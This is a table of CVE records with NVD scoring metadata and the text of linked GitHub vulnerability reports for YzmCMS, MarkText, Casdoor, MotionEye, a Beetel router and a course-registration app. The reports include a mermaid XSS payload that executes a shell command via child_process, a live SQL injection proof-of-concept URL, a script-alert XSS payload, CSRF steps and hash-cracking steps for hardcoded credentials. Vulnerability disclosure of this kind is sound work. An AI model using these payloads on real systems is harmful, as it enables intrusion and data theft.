"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/yzmcms/yzmcms/issues/59"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/yzmcms/yzmcms/issues/59"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yzmcms:yzmcms:6.3:*:*:*:*:*:*:*",
"matchCriteriaId": "33CDD39A-96DC-4CF3-9CFF-694DF09B47BB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"352"
] | 352 | https://github.com/yzmcms/yzmcms/issues/59 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"yzmcms",
"yzmcms"
] | This vulnerability allows arbitrary users to be deleted,
There is a user with ID 3,

Click delete and capture the package to generate the POC of CSRF,

Package the deletion request to dorp, and put the generated POC in the HTML page and send it to the administrator. When the administrator clicks the page, the user with ID 3 can be deleted.


| YzmCMS V6. 3. CSRF vulnerability exists in the official version(YzmCMS V6.3 正式版存在csrf漏洞) | https://api.github.com/repos/yzmcms/yzmcms/issues/59/comments | 1 | 2022-01-21T03:30:48Z | 2022-02-14T02:59:09Z | https://github.com/yzmcms/yzmcms/issues/59 | 1,110,013,040 | 59 | 3,154 |
CVE-2022-23888 | 2022-01-28T21:15:10.233 | YzmCMS v6.3 was discovered to contain a Cross-Site Request Forgey (CSRF) via the component /yzmcms/comment/index/init.html. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/yzmcms/yzmcms/issues/60"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/yzmcms/yzmcms/issues/60"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yzmcms:yzmcms:6.3:*:*:*:*:*:*:*",
"matchCriteriaId": "33CDD39A-96DC-4CF3-9CFF-694DF09B47BB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"352"
] | 352 | https://github.com/yzmcms/yzmcms/issues/60 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"yzmcms",
"yzmcms"
] | Prepare two accounts: test01 and test02, background settings allow users to contribute,
Generate POC of CSRF with test01, First log in to test01 and comment on an article, and grab the request packet,


Log in to TEST02 with another browser and open the web page of the generated POC,
Triggered CSRF and successfully commented as TEST02.

| YzmCMSV6. 3. There is a CSRF vulnerability in the foreground in the official version(YzmCMS V6.3 正式版前台存在csrf漏洞) | https://api.github.com/repos/yzmcms/yzmcms/issues/60/comments | 1 | 2022-01-22T02:18:45Z | 2022-02-14T03:00:13Z | https://github.com/yzmcms/yzmcms/issues/60 | 1,111,188,217 | 60 | 3,155 |
CVE-2022-23889 | 2022-01-28T21:15:10.273 | The comment function in YzmCMS v6.3 was discovered as being able to be operated concurrently, allowing attackers to create an unusually large number of comments. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/yzmcms/yzmcms/issues/61"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/yzmcms/yzmcms/issues/61"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yzmcms:yzmcms:6.3:*:*:*:*:*:*:*",
"matchCriteriaId": "33CDD39A-96DC-4CF3-9CFF-694DF09B47BB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"674"
] | 674 | https://github.com/yzmcms/yzmcms/issues/61 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"yzmcms",
"yzmcms"
] | Prepare an account test01, comment at the bottom of an article, and grab the request package,

Send to repeater,

Manually send several times, you can batch brush malicious comments.

| YzmCMS V6. 3. There are concurrent operations in the front desk of the official version.(YzmCMS V6.3 正式版前台存在可并发操作。) | https://api.github.com/repos/yzmcms/yzmcms/issues/61/comments | 3 | 2022-01-22T02:43:52Z | 2025-02-28T13:16:04Z | https://github.com/yzmcms/yzmcms/issues/61 | 1,111,196,610 | 61 | 3,156 |
CVE-2022-24123 | 2022-01-29T23:15:07.497 | MarkText through 0.16.3 does not sanitize the input of a mermaid block before rendering. This could lead to Remote Code Execution via a .md file containing a mutation Cross-Site Scripting (XSS) payload. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/marktext/marktext/issues/2946"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/marktext/marktext/pull/2947"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/marktext/marktext/issues/2946"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/marktext/marktext/pull/2947"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:marktext:marktext:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5F071D01-841F-476E-BAF5-A29F31D88D58",
"versionEndExcluding": null,
"versionEndIncluding": "0.16.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/marktext/marktext/issues/2946 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"marktext",
"marktext"
] | <!--
- Please search for issues that matches the one you want to file and use the thumbs up emoji.
- Please make sure your application version is up to date.
-->
### Description
<!-- Description of the bug -->
According to https://github.com/marktext/marktext/issues/2504 , it will add a closing element at the end, which means it tries to parse it as HTML.
- [x] Can you reproduce the issue? <!-- no: `[ ]` or yes: `[x]` -->
### Steps to reproduce
<!-- Steps how the issue occurred. -->
Insert the following code into a markdown page:
(Remove the `\` in the last line.)
```
```mermaid
sequenceDiagram
B ->> S: <img src=1 onerror="require('child_process').exec('open /System/Applications/Calculator.app')">
hello -> B:
\```
```
**Expected behavior:**
<!-- What you expected to happen -->
Language input for the fenced code block should be sanitized before being rendered.
**Actual behavior:**
<!-- What actually happened -->

### Versions
- MarkText version: v0.16.3
- Operating system: macOS 12.1
| XSS to RCE vulnerability in Mermaid rendered | https://api.github.com/repos/marktext/marktext/issues/2946/comments | 1 | 2022-01-28T05:24:24Z | 2022-01-31T05:51:37Z | https://github.com/marktext/marktext/issues/2946 | 1,117,015,576 | 2,946 | 3,157 |
CVE-2022-24124 | 2022-01-29T23:15:07.540 | The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/casdoor/casdoor/compare/v1.13.0...v1.13.1"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/casdoor/casdoor/issues/439"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/casdoor/casdoor/pull/442"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/casdoor/casdoor/compare/v1.13.0...v1.13.1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/casdoor/casdoor/issues/439"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/casdoor/casdoor/pull/442"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB31AE79-CF12-4C1C-9480-4DE0A2A6375D",
"versionEndExcluding": "1.13.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/casdoor/casdoor/issues/439 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"casdoor",
"casdoor"
] | The query API provides the `field` and `value` parameters to support query by field.
It inserts the user's input into the raw SQL expression which can lead to a SQL injection vulnerability.
```go
session = session.And(fmt.Sprintf("%s like ?", util.SnakeString(field)), fmt.Sprintf("%%%s%%", value))
```
And the `/api/get-organizations` is a public route that everyone can visit.
Proof of concept:
```
https://door.casbin.com/api/get-organizations?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1))%20%20and%20name
``` | SQL injection vulnerability in field filter | https://api.github.com/repos/casdoor/casdoor/issues/439/comments | 7 | 2022-01-22T09:53:09Z | 2022-01-31T05:53:51Z | https://github.com/casdoor/casdoor/issues/439 | 1,111,401,339 | 439 | 3,158 |
CVE-2021-44255 | 2022-01-31T12:15:07.767 | Authenticated remote code execution in MotionEye <= 0.42.1 and MotioneEyeOS <= 20200606 allows a remote attacker to upload a configuration backup file containing a malicious python pickle file which will execute arbitrary code on the server. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ccrisan/motioneyeos/issues/2843"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ccrisan/motioneyeos/issues/2843"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:motioneye_project:motioneye:*:*:*:*:*:*:*:*",
"matchCriteriaId": "ED345730-DFB3-43F6-95C1-D66CF0ADCE67",
"versionEndExcluding": "0.42.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:motioneyeos_project:motioneyeos:*:*:*:*:*:*:*:*",
"matchCriteriaId": "57C1934D-5DF8-4659-BEEC-625BE7146EFE",
"versionEndExcluding": "20200606",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"306"
] | 306 | https://github.com/ccrisan/motioneyeos/issues/2843 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ccrisan",
"motioneyeos"
] | As with many web-based apps, the admin user can run arbitrary code on the underlying system via the web-gui. While that may or may not be a security issue, and for meye use cases it probably isn’t, I feel that the lack of password on the admin account has left many publicly available systems open to exploitation.
I’d suggest a feature to implement a random password on initial installation. Off hand, I don’t really know how that would look. I may be able to implement something if I find time.
Here is a link to my post about the code execution:
https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye/
Long story short - an admin can run arbitrary code via the option to run commands when motion is detected (obviously). Additionally, an admin can upload a backup that contains a malicious tasks.pickle file that will execute arbitrary code. | Lack of admin password leaves many publicly available systems vulnerable to RCE | https://api.github.com/repos/motioneye-project/motioneyeos/issues/2843/comments | 4 | 2021-11-21T15:35:01Z | 2021-12-19T13:38:16Z | https://github.com/motioneye-project/motioneyeos/issues/2843 | 1,059,410,206 | 2,843 | 3,159 |
CVE-2020-36056 | 2022-01-31T13:15:07.787 | Beetel 777VR1-DI Hardware Version REV.1.01 Firmware Version V01.00.09_55 was discovered to contain a cross-site scripting (XSS) vulnerability via the Ping diagnostic option. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/VivekPanday12/CVE-/issues/5"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.linkedin.com/in/vivek-panday-796768149"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/VivekPanday12/CVE-/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.linkedin.com/in/vivek-panday-796768149"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:beetel:777vr1_firmware:01.00.09_55:*:*:*:*:*:*:*",
"matchCriteriaId": "C25270C8-B8A7-47DD-933E-1D5628B411D9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:beetel:777vr1:1.01:*:*:*:*:*:*:*",
"matchCriteriaId": "9FC6345F-F7F9-499B-B96E-1613B587D9F7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
] | [
"79"
] | 79 | https://github.com/VivekPanday12/CVE-/issues/5 | [
"Third Party Advisory"
] | github.com | [
"VivekPanday12",
"CVE-"
] | # Exploit Title: beetel Moderm 777vr1 — Cross Site Scripting on the beetel 777vr1 via the Ping Diagnostic
# Date: 2020–12–25
# Exploit Author: VIVEK PANDAY
# Version: Firmware Version V01.00.09_55 777VR1
# Tested on Windows10
# Linkedln Contact: https://www.linkedin.com/in/vivek-panday-796768149/
# CVE-2020-36056
[Cross-site scripting] (XSS)
Cross site scripting (XSS) is a common attack vector that injects malicious code into a vulnerable web application. XSS differs from other web attack vectors (e.g., SQL injections), in that it does not directly target the application itself. Instead, the users of the web application are the ones at risk.
[Step To Reproduce]
1) Login to your router
2) After signing
3) Select for Maintance Mode
4) Go to Ping Diagnostic option
5) In the host Name field, enter any of these payloads:
<script> alert ("Hacked") </script>
| CVE-2020-36056 beetel Moderm 777vr1 — Cross Site Scripting on the beetel 777vr1 via the Ping Diagnostic | https://api.github.com/repos/VivekPanday12/CVE-/issues/5/comments | 0 | 2022-01-23T15:03:12Z | 2022-01-23T15:03:12Z | https://github.com/VivekPanday12/CVE-/issues/5 | 1,111,895,260 | 5 | 3,160 |
CVE-2020-36064 | 2022-01-31T13:15:07.830 | Online Course Registration v1.0 was discovered to contain hardcoded credentials in the source code which allows attackers access to the control panel if compromised. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/VivekPanday12/CVE-/issues/2"
},
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.sourcecodester.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/VivekPanday12/CVE-/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.sourcecodester.com"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:online_course_registration_project:online_course_registration:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "548C546F-53C6-45B2-B9ED-D573B83C1E22",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"798"
] | 798 | https://github.com/VivekPanday12/CVE-/issues/2 | [
"Third Party Advisory"
] | github.com | [
"VivekPanday12",
"CVE-"
] | # Exploit Title: Online Course Registration — Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access
# Date: 2020–12–25
# Exploit Author: VIVEK PANDAY
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
# Version: 1.0
# Tested on Windows10
# Linkedln Contact: https://www.linkedin.com/in/vivek-panday-796768149
# CVE-2020-36064
**Hardcoded Credentials:**
Hardcoded Passwords, also often referred to as Embedded Credentials, are plain text passwords or other secrets in source code. Password hardcoding refers to the practice of embedding plain text (non-encrypted) passwords and other secrets (SSH Keys, DevOps secrets, etc.) into the source code. Default, hardcoded passwords may be used across many of the same devices, applications, systems, which helps simplify set up at scale, but at the same time, poses a considerable cybersecurity risk.
**[Attack Vectors]**
An attacker can gain admin panel access using default credentials and do malicious activities
**Proof Of Concept**
1 Download source code from https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
2 Now unzip it and go to the Database folder here we can see one SQL file.
3 Now open that file using Notepad and there we can see admin credentials. but the password is encrypted .from pattern I identified that this is MD5 hash. so we can easily decrypt using crackstation.net or any hash cracker tools like Hashcat, John the ripper.
| CVE-2020-36064 Online Course Registration — Use of Hard-coded Credentials in Source Code Leads to Admin Panel Access | https://api.github.com/repos/VivekPanday12/CVE-/issues/2/comments | 0 | 2022-01-23T14:03:54Z | 2022-01-23T14:03:54Z | https://github.com/VivekPanday12/CVE-/issues/2 | 1,111,880,298 | 2 | 3,161 |
CVE-2022-24263 | 2022-01-31T22:15:07.733 | Hospital Management System v4.0 was discovered to contain a SQL injection vulnerability in /Hospital-Management-System-master/func.php via the email parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165882/Hospital-Management-System-4.0-SQL-Injection.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/kishan0725/Hospital-Management-System/issues/17"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
